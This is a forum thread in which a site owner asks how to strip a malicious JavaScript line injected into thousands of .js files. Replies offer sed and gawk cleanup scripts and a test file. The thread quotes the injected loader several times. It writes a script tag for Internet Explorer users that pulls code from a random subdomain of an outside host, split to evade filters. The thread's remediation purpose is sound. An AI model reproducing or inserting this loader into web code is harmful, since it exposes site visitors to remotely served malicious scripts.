LinuxQuestions.org
Help answer threads with 0 replies.
Go Back   LinuxQuestions.org > Forums > Linux Forums > Linux - Newbie
User Name
Password
Linux - Newbie This Linux forum is for members that are new to Linux.
Just starting out and have a question? If it is not in the man pages or the how-to's this is the place!

Notices


Reply
  Search this Thread
Old 04-17-2013, 12:19 PM   #1
sinjed
LQ Newbie
 
Registered: Apr 2013
Posts: 2

Rep: Reputation: Disabled
Script to remove character and malicious line from any file.


We're getting some malicious code injected to our .js files, which we have a couple thousand of on various sites. Anyone know how to remove the added character and line below? Something like sed -i '/statistic-online/d' but for all files? Not sure about the added ";" though.

Before:

});

After:

});;
if(navigator.appName=="Microsoft Internet Explorer"){document.write('<scr'+'ipt language="JavaScript" src="http://'+Math.floor(Math.random()*999999)+'.statistic-online.com/stat_engine.js?v1"></scr'+'ipt>');}
 
Old 04-17-2013, 12:33 PM   #2
Zzipo
LQ Newbie
 
Registered: Mar 2013
Posts: 28

Rep: Reputation: Disabled
I don't catch really what you need, but..

As I understand, You want to remove the next two lines. I don't know if always is going to be like that, or maybe could be new "spaces","tabs",.. between some characters,...

Because if it is just the same two lines, you can use regexp to destroy it.

Like:

Legit code
Code:
blablablabla1
});
blablablabla2
Unlegit code
Code:
blablabla1
});;
if(navigator.appName=="Microsoft Internet Explorer"){document.write('<scr'+'ipt language="JavaScript" src="http://'+Math.floor(Math.random()*999999)+'.statistic-online.com/stat_engine.js?v1"></scr'+'ipt>');}
blablabla2
First, If YOU ARE SURE that it is always added like that, with one more ";" and then all that in the same line, you can just search for "});;" and delete the next line.

But you must be sure, because if you program like ";;" sometimes, you will destroy the next legit line.

If you want to be sure that you only destroy the "injected code", you need to use regexp and write that such a things in the line.
The more complex the regexp is, the better the results are.

For example: if you take care in the regexp to detect:
Code:
...//'+Math.floor....
...//' +Math.floor....
...//' + Math.floor....
...//'+Math.floor....
...//'           +        Math.floor....
...//'
+Math.floor....
...//'
+
Math.floor....
etc
Your regexp will be more complicated, but better results.
 
Old 04-17-2013, 12:42 PM   #3
sinjed
LQ Newbie
 
Registered: Apr 2013
Posts: 2

Original Poster
Rep: Reputation: Disabled
From what we've seen, the line is the exact same in every file. And what we're trying to do is just revert the code to the original state.

From malicious code:

});;
if(navigator.appName=="Microsoft Internet Explorer"){document.write('<scr'+'ipt language="JavaScript" src="http://'+Math.floor(Math.random()*999999)+'.statistic-online.com/stat_engine.js?v1"></scr'+'ipt>');}


To original state:

});
 
Old 04-17-2013, 01:50 PM   #4
Zzipo
LQ Newbie
 
Registered: Mar 2013
Posts: 28

Rep: Reputation: Disabled
Uff... I have been like one hour to learn and can do it.

But, well, finally here it is.

test2.txt
Code:
});;

});

});;
if(navigator.appName=="Microsoft Internet Explorer"){document.write('<scr'+'ipt language="JavaScript" src="http://'+Math.floor(Math.random()*999999)+'.statistic-online.com/stat_engine.js?v1"></scr'+'ipt>');}


});;
if(navigator.appName=="Microsoft Internet Explorer"){document.write('<scr'+'ipt language="JavaScript" src="http://'+Math.floor(Math.random()*999999)+'.statistic-online.com/stat_engine.js?v1"></scr'+'ipt>');}


});;
war, peace, medieval times, spanish inquisition, durruti

});


});;
if(navigator.appName=="Microsoft Internet Explorer"){document.write('<scr'+'ipt language="JavaScript" src="http://'+Math.floor(Math.random()*999999)+'.statistic-online.com/stat_engine.js?v1"></scr'+'ipt>');}


});;
if	( navigator.appName=="Microsoft Internet Explorer"){document.write('<scr'+'ipt language="JavaScript" src="http://'+Math.floor(Math.random()*999999)+'.statistic-online.com/stat_engine.js?v1"></scr'+'ipt>');}



});;
if(navigator.appName=="Microsoft Internet Explorer"){document.write('<scr'+'ipt language="JavaScript" src="http://'+Math.floor(Math.random()*999999)+'.statistic-online.com/stat_engine.js?v1"></scr'+'ipt>');}

something more
script:

Code:
sed '${;q};N;/);;\n/{s/;\nif[[:blank:]]*([[:blank:]]*navigator\.appName==\"Microsoft Internet Explorer\")[[:blank:]]*{document.write('\''<scr'\''+'\''ipt language=\"JavaScript\" src=\"http:\/\/'\''+Math\.floor(Math\.random()\*999999)+'\''\.statistic-online\.com\/stat_engine\.js?v1\"><\/scr'\''+'\''ipt>'\'');}//;b};P;D' <test2.txt >test2_mod.txt
**Remember to add the part [[:blank:]] in the places that you think they can add blanks/tabs, and still it will work. I have done in the first parts, but you will know better what supports JS.

It works really good.

Results:
Code:
});;

});

});


});


});;
war, peace, medieval times, spanish inquisition, durruti

});


});


});



});

something more
Enough help for this week xD

Last edited by Zzipo; 04-17-2013 at 01:54 PM.
 
1 members found this post helpful.
Old 04-17-2013, 02:06 PM   #5
Beryllos
Member
 
Registered: Apr 2013
Location: Massachusetts
Distribution: Debian
Posts: 349

Rep: Reputation: 151Reputation: 151
How is that code getting "injected" in there? Part of your solution has to include stopping that, right?
 
Old 04-17-2013, 02:12 PM   #6
Zzipo
LQ Newbie
 
Registered: Mar 2013
Posts: 28

Rep: Reputation: Disabled
Quote:
Originally Posted by Beryllos View Post
How is that code getting "injected" in there? Part of your solution has to include stopping that, right?
Hahaha, I hope he/she will do it.

This is just "covering" the problem.
 
Old 04-17-2013, 02:20 PM   #7
Habitual
LQ Addict
 
Registered: Jan 2011
Posts: 8,347
Blog Entries: 11

Rep: Reputation: 2320Reputation: 2320Reputation: 2320Reputation: 2320Reputation: 2320Reputation: 2320Reputation: 2320Reputation: 2320Reputation: 2320Reputation: 2320Reputation: 2320
http://25yearsofprogramming.com/blog/20071223.htm
 
Old 04-17-2013, 05:56 PM   #8
PTrenholme
Senior Member
 
Registered: Dec 2004
Location: Olympia, WA, USA
Distribution: Fedora, (K)Ubuntu
Posts: 4,186

Rep: Reputation: 346Reputation: 346Reputation: 346Reputation: 346
This awk program
Code:
#!/bin/gawk -f
/;;$/{
  line=$0
  getline
  if ($0 !~ /navigator.appName==/) {
    print line
  }
  else {
    sub(/;;$/,";",line)
    print line
    next
  }
}
{print}
produces, using the test file posted by Zzpio, above:
Code:
$ ./remove_bad_code.awk bad_code.txt 
});;

});

});


});


});;
war, peace, medieval times, spanish inquisition, durruti

});


});


});



});

something more
Note that the program keys on "navigator.appName" rather than the full line. That could introduce errors, but it was easier to type.

Last edited by PTrenholme; 04-17-2013 at 06:00 PM. Reason: Simplified code
 
Old 04-17-2013, 07:10 PM   #9
chrism01
LQ Guru
 
Registered: Aug 2004
Location: Sydney
Distribution: Centos 6.9, Centos 7.3
Posts: 17,362

Rep: Reputation: 2377Reputation: 2377Reputation: 2377Reputation: 2377Reputation: 2377Reputation: 2377Reputation: 2377Reputation: 2377Reputation: 2377Reputation: 2377Reputation: 2377
Code:
# use this to check a few files
sed '/});;$/N;s/});;\n.*Micro.*/});/' filename

# if ok, add in-place edit switch OR see next
sed -i '/});;$/N;s/});;\n.*Micro.*/});/' filename

# in-place edit + backup
sed -i.bak '/});;$/N;s/});;\n.*Micro.*/});/' filename
Works on my test file; code adapted from http://www.shell-fu.org/lister.php?id=539
 
Old 04-18-2013, 09:23 AM   #10
Habitual
LQ Addict
 
Registered: Jan 2011
Posts: 8,347
Blog Entries: 11

Rep: Reputation: 2320Reputation: 2320Reputation: 2320Reputation: 2320Reputation: 2320Reputation: 2320Reputation: 2320Reputation: 2320Reputation: 2320Reputation: 2320Reputation: 2320
Quote:
Originally Posted by chrism01 View Post
Code:
# use this to check a few files
sed '/});;$/N;s/});;\n.*Micro.*/});/' filename

# if ok, add in-place edit switch OR see next
sed -i '/});;$/N;s/});;\n.*Micro.*/});/' filename

# in-place edit + backup
sed -i.bak '/});;$/N;s/});;\n.*Micro.*/});/' filename
Works on my test file; code adapted from http://www.shell-fu.org/lister.php?id=539
You rock the sed.fu
 
Old 04-18-2013, 07:51 PM   #11
chrism01
LQ Guru
 
Registered: Aug 2004
Location: Sydney
Distribution: Centos 6.9, Centos 7.3
Posts: 17,362

Rep: Reputation: 2377Reputation: 2377Reputation: 2377Reputation: 2377Reputation: 2377Reputation: 2377Reputation: 2377Reputation: 2377Reputation: 2377Reputation: 2377Reputation: 2377
Thanks, but plaudits for the advanced stuff go to that guy in the link; my actual sed fu is pretty basic.
I'm not too bad at adapting stuff though
 
  


Reply


Thread Tools Search this Thread
Search this Thread:

Advanced Search

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is Off
HTML code is Off



Similar Threads
Thread Thread Starter Forum Replies Last Post
[SOLVED] Perl to Remove certain character in every line eminempark Programming 1 01-04-2013 05:46 AM
Shell script/Perl Script to remove the string until it finds special character '_' pooppp Programming 10 07-17-2012 09:36 AM
[SOLVED] Script to remove lines in a file with more than "x" instances of any character ? pissed_budgie Programming 12 10-08-2010 08:16 PM
Shell Script to Remove Malicious Code from Web Pages bahbahthelamb Linux - Enterprise 1 05-12-2009 06:10 PM
Remove a new line character kbmukesh Linux - Newbie 3 04-13-2009 12:41 AM


All times are GMT -5. The time now is 02:50 AM.

Main Menu
Advertisement
My LQ
Write for LQ
LinuxQuestions.org is looking for people interested in writing Editorials, Articles, Reviews, and more. If you'd like to contribute content, let us know.
Main Menu
Syndicate
RSS1  Latest Threads
RSS1  LQ News
Twitter: @linuxquestions
Facebook: linuxquestions Google+: linuxquestions
Open Source Consulting | Domain Registration